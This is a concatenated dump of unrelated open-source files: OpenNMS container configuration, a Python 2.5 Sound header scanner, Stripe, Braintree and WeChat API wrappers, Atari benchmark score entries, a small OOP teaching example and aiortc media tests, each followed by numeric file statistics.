self._container_parameters["backup_enabled"] = self._app_config.get_value("backup", "enabled", "False")
self._container_parameters["backup_url"] = self._app_config.get_value("backup", "url", "")
def setup_container(self):
# container config
self._container_config.set_image("nethinks/opennmsenv-management:1.1.0-1")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/management")
self._container_config.add_buildarg("url_sw_docker", "https://opennmsdeploy.nethinks.com/software/docker/docker-17.03.1-ce.tgz")
self._container_config.set_restart_policy("always")
self._container_config.add_port("2222:22")
self._container_config.add_environment("CONF_SSH_PASSWORD",
self._container_parameters["ssh_password"])
self._container_namedvolumes.append("export")
self._container_namedvolumes.append("management")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("management:/data/container")
self._container_config.add_volume("opennms:/data/all-containers/opennms")
self._container_config.add_volume("rrd:/data/all-containers/rrd")
self._container_config.add_volume("postgres:/data/all-containers/postgres")
self._container_config.add_volume("nginx:/data/all-containers/nginx")
if self._app_config.get_value_boolean("container", "cassandra"):
self._container_config.add_volume("cassandra:/data/all-containers/cassandra")
if self._app_config.get_value_boolean("container", "alarmforwarder"):
self._container_config.add_volume("alarmforwarder:/data/all-containers/alarmforwarder")
if self._app_config.get_value_boolean("container", "grafana"):
self._container_config.add_volume("grafana:/data/all-containers/grafana")
if self._app_config.get_value_boolean("container", "yourdashboard"):
self._container_config.add_volume("yourdashboard:/data/all-containers/yourdashboard")
if self._app_config.get_value_boolean("container", "pris"):
self._container_config.add_volume("pris:/data/all-containers/pris")
self._container_config.add_volume("./init/management:/data/init")
self._container_config.add_volume("/var/run/docker.sock:/var/run/docker.sock")
# create backup config, if required
if self._container_parameters["backup_enabled"] != "False":
self._container_config.add_environment("CONF_BACKUP_ENABLED", "TRUE")
self._container_config.add_environment("CONF_BACKUP_URL",
self._container_parameters["backup_url"])
| 50.771721 | 162 | 0.664665 | 3,148 | 29,803 | 5.893901 | 0.087675 | 0.189178 | 0.148486 | 0.120944 | 0.761776 | 0.718282 | 0.626873 | 0.532769 | 0.482537 | 0.462057 | 0 | 0.008885 | 0.222058 | 29,803 | 586 | 163 | 50.858362 | 0.791374 | 0.103882 | 0 | 0.366584 | 0 | 0.017456 | 0.242338 | 0.061335 | 0 | 0 | 0 | 0 | 0 | 1 | 0.072319 | false | 0.134663 | 0.01995 | 0 | 0.159601 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
# --- File: Mac/Modules/snd/sndscan.py
# --- Repo: jasonadu/Python-2.5 (PSF-2.0)
# Scan Sound.h header file, generate sndgen.py and Sound.py files.
# Then import sndsupport (which execs sndgen.py) to generate Sndmodule.c.
# (Should learn how to tell the compiler to compile it as well.)
import sys
import os
from bgenlocations import TOOLBOXDIR, BGENDIR
sys.path.append(BGENDIR)
from scantools import Scanner
def main():
    input = "Sound.h"
    output = "sndgen.py"
    defsoutput = TOOLBOXDIR + "Sound.py"
    scanner = SoundScanner(input, output, defsoutput)
    scanner.scan()
    scanner.close()
    print "=== Testing definitions output code ==="
    execfile(defsoutput, {}, {})
    print "=== Done scanning and generating, now doing 'import sndsupport' ==="
    import sndsupport
    print "=== Done. It's up to you to compile Sndmodule.c ==="


class SoundScanner(Scanner):

    def destination(self, type, name, arglist):
        classname = "SndFunction"
        listname = "functions"
        if arglist:
            t, n, m = arglist[0]
            if t == "SndChannelPtr" and m == "InMode":
                classname = "SndMethod"
                listname = "sndmethods"
        return classname, listname

    def writeinitialdefs(self):
        self.defsfile.write("def FOUR_CHAR_CODE(x): return x\n")

    def makeblacklistnames(self):
        return [
            'SndDisposeChannel',    # automatic on deallocation
            'SndAddModifier',       # for internal use only
            'SndPlayDoubleBuffer',  # very low level routine
            # Missing from libraries (UH332)
            'SoundManagerSetInfo',
            'SoundManagerGetInfo',
            # Constants with funny definitions
            'rate48khz',
            'rate44khz',
            'kInvalidSource',
            # OS8 only:
            'MACEVersion',
            'SPBRecordToFile',
            'Exp1to6',
            'Comp6to1',
            'Exp1to3',
            'Comp3to1',
            'SndControl',
            'SndStopFilePlay',
            'SndStartFilePlay',
            'SndPauseFilePlay',
            'SndRecordToFile',
        ]

    def makeblacklisttypes(self):
        return [
            "GetSoundVol",
            "SetSoundVol",
            "UnsignedFixed",
            # Don't have the time to dig into this...
            "Component",
            "ComponentInstance",
            "SoundComponentDataPtr",
            "SoundComponentData",
            "SoundComponentData_ptr",
            "SoundConverter",
        ]

    def makerepairinstructions(self):
        return [
            ([("Str255", "*", "InMode")],
             [("*", "*", "OutMode")]),

            ([("void_ptr", "*", "InMode"), ("long", "*", "InMode")],
             [("InBuffer", "*", "*")]),

            ([("void", "*", "OutMode"), ("long", "*", "InMode"),
              ("long", "*", "OutMode")],
             [("VarVarOutBuffer", "*", "InOutMode")]),

            ([("SCStatusPtr", "*", "InMode")],
             [("SCStatus", "*", "OutMode")]),

            ([("SMStatusPtr", "*", "InMode")],
             [("SMStatus", "*", "OutMode")]),

            ([("CompressionInfoPtr", "*", "InMode")],
             [("CompressionInfo", "*", "OutMode")]),

            # For SndPlay's SndListHandle argument
            ([("Handle", "sndHdl", "InMode")],
             [("SndListHandle", "*", "*")]),

            # For SndStartFilePlay
            ([("long", "bufferSize", "InMode"), ("void", "theBuffer", "OutMode")],
             [("*", "*", "*"), ("FakeType('0')", "*", "InMode")]),

            # For Comp3to1 etc.
            ([("void_ptr", "inBuffer", "InMode"),
              ("void", "outBuffer", "OutMode"),
              ("unsigned_long", "cnt", "InMode")],
             [("InOutBuffer", "buffer", "InOutMode")]),

            # Ditto
            ## ([("void_ptr", "inState", "InMode"), ("void", "outState", "OutMode")],
            ##  [("InOutBuf128", "state", "InOutMode")]),
            ([("StateBlockPtr", "inState", "InMode"), ("StateBlockPtr", "outState", "InMode")],
             [("StateBlock", "state", "InOutMode")]),

            # Catch-all for the last couple of void pointers
            ([("void", "*", "OutMode")],
             [("void_ptr", "*", "InMode")]),
        ]


if __name__ == "__main__":
    main()
| 35.503876 | 99 | 0.464192 | 324 | 4,580 | 6.512346 | 0.552469 | 0.01327 | 0.01327 | 0.018957 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009097 | 0.375983 | 4,580 | 128 | 100 | 35.78125 | 0.729181 | 0.14607 | 0 | 0.032258 | 1 | 0 | 0.305577 | 0.011051 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.064516 | null | null | 0.032258 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
c4ad1c463eaeab93be24f5ec8daa4a3369b44b3c | 314 | py | Python | amms/tests/test_model_manager.py | AndSt/AMMS | 6ebcd272de5baf14a37269ca1334b84d85b08ffa | [
"Apache-2.0"
] | 1 | 2020-04-30T12:00:21.000Z | 2020-04-30T12:00:21.000Z | amms/tests/test_model_manager.py | AndSt/AMMS | 6ebcd272de5baf14a37269ca1334b84d85b08ffa | [
"Apache-2.0"
] | null | null | null | amms/tests/test_model_manager.py | AndSt/AMMS | 6ebcd272de5baf14a37269ca1334b84d85b08ffa | [
"Apache-2.0"
] | null | null | null | import os
from src.model_manager import ModelManager
dir_path = os.path.dirname(os.path.realpath(__file__))
config_file = '{}/data/config/config_1.json'.format(dir_path)
model_dir = '{}/data/models'.format(dir_path)
def test_init():
    mm = ModelManager(config_file, model_dir)


def test_predict():
    pass
| 19.625 | 61 | 0.745223 | 47 | 314 | 4.659574 | 0.510638 | 0.09589 | 0.118721 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003623 | 0.121019 | 314 | 15 | 62 | 20.933333 | 0.789855 | 0 | 0 | 0 | 0 | 0 | 0.133758 | 0.089172 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0.111111 | 0.222222 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
c4b6cdd41e4ccaed90308c503f92af65bcb70a25 | 6,644 | py | Python | rldb/db/paper__reactor/algo__reactor/entries.py | seungjaeryanlee/sotarl | 8c471c4666d6210c68f3cb468e439a2b168c785d | [
"MIT"
] | 45 | 2019-05-13T17:39:33.000Z | 2022-03-07T23:44:13.000Z | rldb/db/paper__reactor/algo__reactor/entries.py | seungjaeryanlee/sotarl | 8c471c4666d6210c68f3cb468e439a2b168c785d | [
"MIT"
] | 2 | 2019-03-29T01:41:59.000Z | 2019-07-02T02:48:31.000Z | rldb/db/paper__reactor/algo__reactor/entries.py | seungjaeryanlee/sotarl | 8c471c4666d6210c68f3cb468e439a2b168c785d | [
"MIT"
] | 2 | 2020-04-07T20:57:30.000Z | 2020-07-08T12:55:15.000Z | entries = [
{
"env-title": "atari-alien",
"env-variant": "No-op start",
"score": 6482.10,
},
{
"env-title": "atari-amidar",
"env-variant": "No-op start",
"score": 833,
},
{
"env-title": "atari-assault",
"env-variant": "No-op start",
"score": 11013.50,
},
{
"env-title": "atari-asterix",
"env-variant": "No-op start",
"score": 36238.50,
},
{
"env-title": "atari-asteroids",
"env-variant": "No-op start",
"score": 2780.40,
},
{
"env-title": "atari-atlantis",
"env-variant": "No-op start",
"score": 308258,
},
{
"env-title": "atari-bank-heist",
"env-variant": "No-op start",
"score": 988.70,
},
{
"env-title": "atari-battle-zone",
"env-variant": "No-op start",
"score": 61220,
},
{
"env-title": "atari-beam-rider",
"env-variant": "No-op start",
"score": 8566.50,
},
{
"env-title": "atari-berzerk",
"env-variant": "No-op start",
"score": 1641.40,
},
{
"env-title": "atari-bowling",
"env-variant": "No-op start",
"score": 75.40,
},
{
"env-title": "atari-boxing",
"env-variant": "No-op start",
"score": 99.40,
},
{
"env-title": "atari-breakout",
"env-variant": "No-op start",
"score": 518.40,
},
{
"env-title": "atari-centipede",
"env-variant": "No-op start",
"score": 3402.80,
},
{
"env-title": "atari-chopper-command",
"env-variant": "No-op start",
"score": 37568,
},
{
"env-title": "atari-crazy-climber",
"env-variant": "No-op start",
"score": 194347,
},
{
"env-title": "atari-defender",
"env-variant": "No-op start",
"score": 113128,
},
{
"env-title": "atari-demon-attack",
"env-variant": "No-op start",
"score": 100189,
},
{
"env-title": "atari-double-dunk",
"env-variant": "No-op start",
"score": 11.40,
},
{
"env-title": "atari-enduro",
"env-variant": "No-op start",
"score": 2230.10,
},
{
"env-title": "atari-fishing-derby",
"env-variant": "No-op start",
"score": 23.20,
},
{
"env-title": "atari-freeway",
"env-variant": "No-op start",
"score": 31.40,
},
{
"env-title": "atari-frostbite",
"env-variant": "No-op start",
"score": 8042.10,
},
{
"env-title": "atari-gopher",
"env-variant": "No-op start",
"score": 69135.10,
},
{
"env-title": "atari-gravitar",
"env-variant": "No-op start",
"score": 1073.80,
},
{
"env-title": "atari-hero",
"env-variant": "No-op start",
"score": 35542.20,
},
{
"env-title": "atari-ice-hockey",
"env-variant": "No-op start",
"score": 3.40,
},
{
"env-title": "atari-jamesbond",
"env-variant": "No-op start",
"score": 7869.20,
},
{
"env-title": "atari-kangaroo",
"env-variant": "No-op start",
"score": 10484.50,
},
{
"env-title": "atari-krull",
"env-variant": "No-op start",
"score": 9930.80,
},
{
"env-title": "atari-kung-fu-master",
"env-variant": "No-op start",
"score": 59799.50,
},
{
"env-title": "atari-montezuma-revenge",
"env-variant": "No-op start",
"score": 2643.50,
},
{
"env-title": "atari-ms-pacman",
"env-variant": "No-op start",
"score": 2724.30,
},
{
"env-title": "atari-name-this-game",
"env-variant": "No-op start",
"score": 9907.20,
},
{
"env-title": "atari-phoenix",
"env-variant": "No-op start",
"score": 40092.20,
},
{
"env-title": "atari-pitfall",
"env-variant": "No-op start",
"score": -3.50,
},
{
"env-title": "atari-pong",
"env-variant": "No-op start",
"score": 20.70,
},
{
"env-title": "atari-private-eye",
"env-variant": "No-op start",
"score": 15177.10,
},
{
"env-title": "atari-qbert",
"env-variant": "No-op start",
"score": 22956.50,
},
{
"env-title": "atari-riverraid",
"env-variant": "No-op start",
"score": 16608.30,
},
{
"env-title": "atari-road-runner",
"env-variant": "No-op start",
"score": 71168,
},
{
"env-title": "atari-robotank",
"env-variant": "No-op start",
"score": 68.50,
},
{
"env-title": "atari-seaquest",
"env-variant": "No-op start",
"score": 8425.80,
},
{
"env-title": "atari-skiing",
"env-variant": "No-op start",
"score": -10753.40,
},
{
"env-title": "atari-solaris",
"env-variant": "No-op start",
"score": 2760,
},
{
"env-title": "atari-space-invaders",
"env-variant": "No-op start",
"score": 2448.60,
},
{
"env-title": "atari-star-gunner",
"env-variant": "No-op start",
"score": 70038,
},
{
"env-title": "atari-surround",
"env-variant": "No-op start",
"score": 6.70,
},
{
"env-title": "atari-tennis",
"env-variant": "No-op start",
"score": 23.30,
},
{
"env-title": "atari-time-pilot",
"env-variant": "No-op start",
"score": 19401,
},
{
"env-title": "atari-tutankham",
"env-variant": "No-op start",
"score": 272.60,
},
{
"env-title": "atari-up-n-down",
"env-variant": "No-op start",
"score": 64354.20,
},
{
"env-title": "atari-venture",
"env-variant": "No-op start",
"score": 1597.50,
},
{
"env-title": "atari-video-pinball",
"env-variant": "No-op start",
"score": 469366,
},
{
"env-title": "atari-wizard-of-wor",
"env-variant": "No-op start",
"score": 13170.50,
},
{
"env-title": "atari-yars-revenge",
"env-variant": "No-op start",
"score": 102760,
},
{
"env-title": "atari-zaxxon",
"env-variant": "No-op start",
"score": 25215.50,
},
]
| 23.069444 | 47 | 0.439043 | 698 | 6,644 | 4.179083 | 0.219198 | 0.156325 | 0.254028 | 0.273569 | 0.475831 | 0.475831 | 0.056222 | 0 | 0 | 0 | 0 | 0.073902 | 0.352348 | 6,644 | 287 | 48 | 23.149826 | 0.603997 | 0 | 0 | 0.198606 | 0 | 0 | 0.436936 | 0.006623 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
c4bdcfba3d514625a5d312483711b476c4e6a57e | 551 | py | Python | stripe/api_resources/dispute.py | timvisher/stripe-python | ae953fd0aa531f5b500e5e86eee5859df95a255d | [
"MIT"
] | 2 | 2020-12-05T09:02:14.000Z | 2021-03-28T17:23:20.000Z | stripe/api_resources/dispute.py | timvisher/stripe-python | ae953fd0aa531f5b500e5e86eee5859df95a255d | [
"MIT"
] | 11 | 2019-12-26T17:21:03.000Z | 2022-03-21T22:17:07.000Z | lib/stripe/api_resources/dispute.py | linuxpi/hypoconn_gcloud | ebf06c44dc754ac446a0915a0db028f18e3f35a7 | [
"Apache-2.0"
] | 2 | 2019-12-19T10:25:38.000Z | 2020-01-03T08:54:20.000Z | from __future__ import absolute_import, division, print_function
from stripe import util
from stripe.api_resources.abstract import ListableAPIResource
from stripe.api_resources.abstract import UpdateableAPIResource
class Dispute(ListableAPIResource, UpdateableAPIResource):
    OBJECT_NAME = 'dispute'

    def close(self, idempotency_key=None, **params):
        url = self.instance_url() + '/close'
        headers = util.populate_headers(idempotency_key)
        self.refresh_from(self.request('post', url, params, headers))
        return self
| 34.4375 | 69 | 0.764065 | 62 | 551 | 6.564516 | 0.532258 | 0.07371 | 0.063882 | 0.108108 | 0.176904 | 0.176904 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15608 | 551 | 15 | 70 | 36.733333 | 0.875269 | 0 | 0 | 0 | 0 | 0 | 0.030853 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.363636 | 0 | 0.727273 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
c4e5e125594ec7571b54a20e6edf7d5b9509531f | 656 | py | Python | aldjemy/wrapper.py | Piero-Palevsky-OH/aldjemy | dc79f3b7aabe47c4a13e44f61038bc19a921980d | [
"BSD-3-Clause"
] | 255 | 2015-01-20T08:55:20.000Z | 2020-01-17T11:23:31.000Z | aldjemy/wrapper.py | Piero-Palevsky-OH/aldjemy | dc79f3b7aabe47c4a13e44f61038bc19a921980d | [
"BSD-3-Clause"
] | 113 | 2020-01-24T19:43:46.000Z | 2022-03-27T08:57:53.000Z | aldjemy/wrapper.py | Piero-Palevsky-OH/aldjemy | dc79f3b7aabe47c4a13e44f61038bc19a921980d | [
"BSD-3-Clause"
] | 53 | 2015-01-22T12:58:35.000Z | 2020-01-12T23:20:18.000Z | class Wrapper:
    "Wrapper to disable commit in sqla"

    def __init__(self, obj):
        self.obj = obj

    def __getattr__(self, attr):
        if attr in ["commit", "rollback"]:
            return lambda *args, **kwargs: None
        obj = getattr(self.obj, attr)
        if attr not in ["cursor", "execute"]:
            return obj
        if attr == "cursor":
            return type(self)(obj)
        return self.wrapper(obj)

    def wrapper(self, obj):
        "Implement if you need to make your customized wrapper"
        return obj

    def __call__(self, *args, **kwargs):
        self.obj = self.obj(*args, **kwargs)
        return self
| 27.333333 | 63 | 0.565549 | 81 | 656 | 4.432099 | 0.382716 | 0.13649 | 0.061281 | 0.077994 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.321646 | 656 | 23 | 64 | 28.521739 | 0.806742 | 0.132622 | 0 | 0.105263 | 0 | 0 | 0.181402 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.210526 | false | 0 | 0 | 0 | 0.578947 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
c4e8a57a1d8989b002c52e56cd6c82d2de98658b | 1,760 | py | Python | saleor/lib/python3.7/site-packages/braintree/paypal_account_gateway.py | cxsper/saleor | 5566ddcdaf8f72ba872eca869798e66eb9cdae44 | [
"BSD-3-Clause"
] | 2 | 2019-12-06T15:40:14.000Z | 2020-07-29T21:30:35.000Z | saleor/lib/python3.7/site-packages/braintree/paypal_account_gateway.py | cxsper/saleor | 5566ddcdaf8f72ba872eca869798e66eb9cdae44 | [
"BSD-3-Clause"
] | 13 | 2020-03-24T17:53:51.000Z | 2022-02-10T20:01:14.000Z | myvenv/lib/python3.6/site-packages/braintree/paypal_account_gateway.py | yog240597/saleor | b75a23827a4ec2ce91637f0afe6808c9d09da00a | [
"CC-BY-4.0"
] | 2 | 2019-05-06T01:10:41.000Z | 2019-05-06T01:10:42.000Z | import braintree
from braintree.paypal_account import PayPalAccount
from braintree.error_result import ErrorResult
from braintree.exceptions.not_found_error import NotFoundError
from braintree.resource import Resource
from braintree.successful_result import SuccessfulResult
class PayPalAccountGateway(object):
    def __init__(self, gateway):
        self.gateway = gateway
        self.config = gateway.config

    def find(self, paypal_account_token):
        try:
            if paypal_account_token is None or paypal_account_token.strip() == "":
                raise NotFoundError()
            response = self.config.http().get(self.config.base_merchant_path() + "/payment_methods/paypal_account/" + paypal_account_token)
            if "paypal_account" in response:
                return PayPalAccount(self.gateway, response["paypal_account"])
        except NotFoundError:
            raise NotFoundError("paypal account with token " + repr(paypal_account_token) + " not found")

    def delete(self, paypal_account_token):
        self.config.http().delete(self.config.base_merchant_path() + "/payment_methods/paypal_account/" + paypal_account_token)
        return SuccessfulResult()

    def update(self, paypal_account_token, params={}):
        Resource.verify_keys(params, PayPalAccount.signature())
        response = self.config.http().put(self.config.base_merchant_path() + "/payment_methods/paypal_account/" + paypal_account_token, {"paypal_account": params})
        if "paypal_account" in response:
            return SuccessfulResult({"paypal_account": PayPalAccount(self.gateway, response["paypal_account"])})
        elif "api_error_response" in response:
            return ErrorResult(self.gateway, response["api_error_response"])
| 50.285714 | 163 | 0.723295 | 196 | 1,760 | 6.239796 | 0.280612 | 0.212592 | 0.132461 | 0.053966 | 0.298446 | 0.298446 | 0.174162 | 0.174162 | 0.174162 | 0.174162 | 0 | 0 | 0.181818 | 1,760 | 34 | 164 | 51.764706 | 0.849306 | 0 | 0 | 0.068966 | 0 | 0 | 0.143182 | 0.054545 | 0 | 0 | 0 | 0 | 0 | 1 | 0.137931 | false | 0 | 0.206897 | 0 | 0.517241 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
f2022bc40eecc81e28e26c6af9c01ec57c188253 | 931 | py | Python | oo/pessoa.py | Sir-Gonzo/pythonbirds | 2653da896d05e74d204d2f97c92f8bcfaa4d0013 | [
"MIT"
] | null | null | null | oo/pessoa.py | Sir-Gonzo/pythonbirds | 2653da896d05e74d204d2f97c92f8bcfaa4d0013 | [
"MIT"
] | null | null | null | oo/pessoa.py | Sir-Gonzo/pythonbirds | 2653da896d05e74d204d2f97c92f8bcfaa4d0013 | [
"MIT"
] | null | null | null | class Pessoa:
    olhos = 2  # class attribute

    def __init__(self, *filhos, nome=None, idade=35):  # instance attributes
        self.idade = idade
        self.nome = nome
        self.filhos = list(filhos)

    def cumprimentar(self):
        return f'Olá {id(self)}.'

    @staticmethod
    def metodo_estatico():
        return 42

    @classmethod
    def metodo_de_classe(cls):
        return f'{cls} - olhos: {cls.olhos}'


class Homem(Pessoa):
    def cumprimentar(self):
        return f'{super().cumprimentar()} Aperto de mão'


class Mutante(Pessoa):
    olhos = 3


if __name__ == "__main__":
    luciano = Homem(nome="Luciano")
    renzo = Mutante("Luciano", "Luciana", "Pedro", nome="Renzo")
    print(f"{renzo.nome} tem os filhos {', '.join(str(x) for x in renzo.filhos[:-1])} e {renzo.filhos[-1]}.")
    print(luciano.cumprimentar())
    print(Pessoa.metodo_estatico())
    print(luciano.metodo_de_classe())
| 27.382353 | 109 | 0.625134 | 118 | 931 | 4.779661 | 0.440678 | 0.042553 | 0.067376 | 0.088652 | 0.092199 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011127 | 0.227712 | 931 | 33 | 110 | 28.212121 | 0.773296 | 0.044039 | 0 | 0.076923 | 0 | 0.038462 | 0.240135 | 0.027058 | 0 | 0 | 0 | 0 | 0 | 1 | 0.192308 | false | 0 | 0 | 0.153846 | 0.538462 | 0.153846 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 2 |
f20b629f6076335837fcdba2acc333eea27865ad | 1,052 | py | Python | findy/vendor/wechatpy/work/client/api/menu.py | doncat99/FinanceDataCenter | 1538c8347ed5bff9a99a3cca07507a7605108124 | [
"MIT"
] | null | null | null | findy/vendor/wechatpy/work/client/api/menu.py | doncat99/FinanceDataCenter | 1538c8347ed5bff9a99a3cca07507a7605108124 | [
"MIT"
] | null | null | null | findy/vendor/wechatpy/work/client/api/menu.py | doncat99/FinanceDataCenter | 1538c8347ed5bff9a99a3cca07507a7605108124 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from findy.vendor.wechatpy.client.api.base import BaseWeChatAPI
class WeChatMenu(BaseWeChatAPI):
    """
    Custom menus

    https://work.weixin.qq.com/api/doc#90000/90135/90230
    """

    def create(self, agent_id, menu_data):
        """
        Create a menu

        https://work.weixin.qq.com/api/doc#90000/90135/90231

        :param agent_id: application id
        """
        return self._post("menu/create", params={"agentid": agent_id}, data=menu_data)

    def get(self, agent_id):
        """
        Get the menu

        https://work.weixin.qq.com/api/doc#90000/90135/90232

        :param agent_id: application id
        """
        return self._get("menu/get", params={"agentid": agent_id})

    def delete(self, agent_id):
        """
        Delete the menu

        https://work.weixin.qq.com/api/doc#90000/90135/90233

        :param agent_id: application id
        """
        return self._get("menu/delete", params={"agentid": agent_id})

    def update(self, agent_id, menu_data):
        self.delete(agent_id)
        return self.create(agent_id, menu_data)
| 22.382979 | 86 | 0.590304 | 136 | 1,052 | 4.426471 | 0.338235 | 0.139535 | 0.099668 | 0.112957 | 0.531561 | 0.392027 | 0.348837 | 0.348837 | 0.239203 | 0 | 0 | 0.078406 | 0.260456 | 1,052 | 46 | 87 | 22.869565 | 0.695373 | 0.311787 | 0 | 0 | 0 | 0 | 0.086882 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.363636 | false | 0 | 0.090909 | 0 | 0.909091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
f211eb23f573ba0015f8707cbfda65f74ffae9cf | 9,608 | py | Python | tests/test_contrib_media.py | AlexVestin/cloneaio | 5792c819482ed7e19252b8b0c00532a0932e0b3b | [
"BSD-3-Clause"
] | 4 | 2019-09-02T22:26:03.000Z | 2020-09-02T18:13:29.000Z | tests/test_contrib_media.py | AlexVestin/cloneaio | 5792c819482ed7e19252b8b0c00532a0932e0b3b | [
"BSD-3-Clause"
] | null | null | null | tests/test_contrib_media.py | AlexVestin/cloneaio | 5792c819482ed7e19252b8b0c00532a0932e0b3b | [
"BSD-3-Clause"
] | 2 | 2021-03-04T04:05:54.000Z | 2021-03-25T07:33:43.000Z | import asyncio
import os
import tempfile
import wave
from unittest import TestCase
import av
from aiortc import AudioStreamTrack, VideoStreamTrack
from aiortc.contrib.media import MediaBlackhole, MediaPlayer, MediaRecorder
from aiortc.mediastreams import MediaStreamError
from .codecs import CodecTestCase
from .utils import run
class MediaTestCase(CodecTestCase):
    def setUp(self):
        self.directory = tempfile.TemporaryDirectory()

    def tearDown(self):
        self.directory.cleanup()

    def create_audio_file(self, name, channels=1, sample_rate=8000, sample_width=2):
        path = self.temporary_path(name)

        writer = wave.open(path, 'wb')
        writer.setnchannels(channels)
        writer.setframerate(sample_rate)
        writer.setsampwidth(sample_width)
        writer.writeframes(b'\x00' * sample_rate * sample_width * channels)
        writer.close()

        return path

    def create_video_file(self, name, width=640, height=480, rate=30, duration=1):
        path = self.temporary_path(name)

        container = av.open(path, 'w')
        if name.endswith('.png'):
            stream = container.add_stream('png', rate=rate)
            stream.pix_fmt = 'rgb24'
        else:
            stream = container.add_stream('mpeg4', rate=rate)
        for frame in self.create_video_frames(width=width, height=height, count=duration * rate):
            for packet in stream.encode(frame):
                container.mux(packet)
        for packet in stream.encode(None):
            container.mux(packet)
        container.close()

        return path

    def temporary_path(self, name):
        return os.path.join(self.directory.name, name)


class MediaBlackholeTest(TestCase):
    def test_audio(self):
        recorder = MediaBlackhole()
        recorder.addTrack(AudioStreamTrack())
        run(recorder.start())
        run(asyncio.sleep(1))
        run(recorder.stop())

    def test_audio_ended(self):
        track = AudioStreamTrack()

        recorder = MediaBlackhole()
        recorder.addTrack(track)
        run(recorder.start())
        run(asyncio.sleep(1))
        track.stop()
        run(asyncio.sleep(1))

        run(recorder.stop())

    def test_audio_and_video(self):
        recorder = MediaBlackhole()
        recorder.addTrack(AudioStreamTrack())
        recorder.addTrack(VideoStreamTrack())
        run(recorder.start())
        run(asyncio.sleep(2))
        run(recorder.stop())

    def test_video(self):
        recorder = MediaBlackhole()
        recorder.addTrack(VideoStreamTrack())
        run(recorder.start())
        run(asyncio.sleep(2))
        run(recorder.stop())

    def test_video_ended(self):
        track = VideoStreamTrack()

        recorder = MediaBlackhole()
        recorder.addTrack(track)
        run(recorder.start())
        run(asyncio.sleep(1))
        track.stop()
        run(asyncio.sleep(1))

        run(recorder.stop())


class MediaPlayerTest(MediaTestCase):
    def test_audio_file_8kHz(self):
        path = self.create_audio_file('test.wav')
        player = MediaPlayer(path)

        # check tracks
        self.assertIsNotNone(player.audio)
        self.assertIsNone(player.video)

        # read all frames
        self.assertEqual(player.audio.readyState, 'live')
        for i in range(49):
            frame = run(player.audio.recv())
            self.assertEqual(frame.format.name, 's16')
            self.assertEqual(frame.layout.name, 'stereo')
            self.assertEqual(frame.samples, 960)
            self.assertEqual(frame.sample_rate, 48000)
        with self.assertRaises(MediaStreamError):
            run(player.audio.recv())
        self.assertEqual(player.audio.readyState, 'ended')

        # try reading again
        with self.assertRaises(MediaStreamError):
            run(player.audio.recv())

    def test_audio_file_48kHz(self):
